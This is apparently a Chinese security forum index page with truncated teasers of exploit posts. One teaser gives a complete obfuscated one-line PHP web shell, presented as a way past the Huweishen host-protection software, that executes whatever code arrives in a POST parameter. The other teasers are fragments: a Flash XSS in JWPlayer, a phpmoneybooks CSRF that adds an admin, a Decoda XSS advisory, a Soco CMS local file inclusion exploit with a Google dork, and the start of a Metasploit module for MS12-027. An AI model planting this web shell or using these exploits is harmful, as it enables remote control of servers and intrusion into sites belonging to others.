“安全六月”主题活动之检测黑客攻防实验室。

这叫有来有往。 http://www.hoclab.com/bbs       ...

过护卫神PHP一句话(转)

<?php $a = str_replace(x,”",”axsxxsxexrxxt”); $a($_POST["c"]); ?> ...

Flash xss预警。

在乌云看到的。目前发现各大网站都存在,百度、猫扑、英特尔、腾讯…… A Xss vulnerability in JWPlayer Test Browser: IE , Firefox. Test P ...

phpmoneybooks CSRF Vulnerability (Add Admin)

Exploit: <html> <head> <title>phpmoneybooks [Add Admin]</title> </head&gt ...

Decoda跨站脚本漏洞

Decoda 3.3.3之前版本中存在跨站脚本漏洞,该漏洞源于对用户提供的输入未经正确过滤。 攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cookie的认证证书进 ...

SOCO CMS本地文件包含漏洞

# Exploit Title: Soco CMS Local File Include # Google Dork: "Powered by Soco" # Date: 28/04/2012 # V ...

MS12-027 MSCOMCTL ActiveX Buffer Overflow

require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking inclu ...